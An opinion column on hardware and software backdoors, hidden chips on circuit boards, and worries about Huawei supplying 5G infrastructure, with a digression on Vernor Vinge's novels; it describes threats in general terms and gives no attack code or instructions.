“Holy Security Systems Batman!” Our Boards are Bugged!
Recently, I’ve been thinking a lot about security. The term “backdoor” refers to techniques that can be used to bypass a system’s security mechanisms. Some of these backdoors are the result of hardware or software design flaws that can be exploited by hackers; some are built into the hardware or software by designers; yet others are installed into higher-level systems by nefarious parties.
There are several ways in which backdoors can be introduced to a system. In the case of software, a backdoor could be incorporated as a hidden part of an application program, or the operating system (OS), or the firmware on the board. There are also malware applications like Trojan horses that, when executed, trigger an activity that may install a backdoor.
In the case of hardware, one or more of the off-the-shelf integrated circuits used in a design may contain hardwired backdoors. Alternatively, if you are designing a System-on-Chip (SoC) and you purchase intellectual property (IP) blocks from third-party vendors, those blocks may themselves contain backdoors.
When you are talking about hundreds of thousands of lines of hardware description language (HDL) code, these can be almost impossible to spot, even if you have access to the source code. In many cases, however, the source code is provided in an encrypted format, which means you have no chance at all.
In earlier columns, I mused on US-China Tariffs, Trade, and Technology (see Part 1 and Part 2). With regard to the Chinese communications behemoth, Huawei (pronounced “ hoo-ah-way”), I noted that a lot of people are worried that Huawei either has, or may in the future, put backdoors into their equipment.
Some of the concerns with Huawei are based on the fact that its Founder and CEO, Ren Zhengfei, worked as an engineer in the Information Technology Research Unit of the People’s Liberation Army (PLA) for close to 10 years. Ren also has strong ties with China’s communist party.
There have been numerous reports of China hacking American computer networks and stealing data. It’s also concerning that China recently introduced a new intelligence law, Article Seven of which states: “All organizations and citizens shall, in accordance with the law, support, cooperate with, and collaborate in national intelligence work, and guard the secrecy of national intelligence work they are aware of.”
A recent article on WIRED described just how easy it may be to hide malicious chips inside IT equipment. At the All Things Open conference in October 2019, a Hardware Hacking 101 talk described how rogue keyboards can be used to unleash pre-programmed keystroke payloads, where these payloads can include, “reverse shells, binary injection, brute force password attacks, and just about any attack that can be fully automated.”
In October 2018, Bloomberg Businessweek published a provocative article, The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies (the details were subsequently questioned in this article and elaborated on in this piece).
Sometimes it’s hard to know what to believe, so I asked a friend who is a security expert and active in this area. He told me about a router motherboard his company had been asked to examine because it was behaving strangely.
The board in question was of Chinese origin but was not directly manufactured by Huawei. Using an infrared imager, they observed a hot spot under one of the chips. When they de-soldered the main chip, they found a smaller undocumented chip embedded in the board. My friend told me that the function of this chip was nefarious in nature, but that he was not at liberty to discuss this in any detail. My friend went on to say:
There are multiple domains that can be used to examine chips/motherboards for implants. Infrared, X-Ray, radio, dynamic power analysis and more. And, the device doesn’t have to be very large to compromise the board management controller (BMC). I think that the important information is that this is very doable and, with a largish budget, you can miniaturize something to be almost undetectable. Unfortunately, I really can’t say any more about it and I’ve probably already said too much.
There are two science fiction books by Vernor Vinge that made a big impression on me. The first was A Fire Upon the Deep, which can loosely be described as a space opera set in the far distant future in various locations around the Milky Way involving superhuman intelligences, aliens, variable physics, space battles, love, betrayal, and genocide. Vernor followed this masterpiece with a prequel called A Deepness in the Sky, which is set 20,000 years earlier. It’s this latter tome that is relevant to our discussions here.
In addition to more aliens than you can swing a stick at, there are two groups of humans — the Qeng Ho, who are traders, and the Emergents, who aren’t very nice. After a fight, the Emergents subjugate the Qeng Ho. Posing as an inept and bumbling fleet elder, one of the Qeng Ho manages to introduce backdoors into the Emergents’ oppressive security systems, eventually using these backdoors to subvert the Emergents’ systems and save the day.
The reason I mention all this here is that it made me think about what might happen if countries like the US allow a company like Huawei to provide the 5G infrastructure that will dominate next-generation communications.
In addition to the possibility of an unfriendly nation state potentially having the ability to monitor all of our communications, there’s also the possibility of them inserting their own messages into the stream (as a disinformation strategy to spread FUD; i.e., fear, uncertainty, and doubt), modifying existing messages while they are “on route,” or editing archived messages to reflect an alternate reality.
Even worse, 5G will eventually come in three flavors — Enhanced Mobile Broadband (eMBB), Ultra Reliable Low Latency Communications (URLLC), and Massive Machine Type Communications (mMTC) — and is expected to subsume the vast majority of our communications capabilities (see also 5G Meets 50,000 Fans at Super Bowl 2025).
Now, suppose that there are backdoors into every piece of equipment that allows our adversaries to throw “kill switches” and shut everything down, from power stations to water treatment plants to… well, pretty much everything.
Is this likely to happen? I don’t know. Might it be a possibility at some time in the future? Almost certainly unless we start paying attention as to from whom we are obtaining our integrated circuits (or the IP we use to build our own), our systems, and our software. What do you think about all of this? Are you as worried as me?
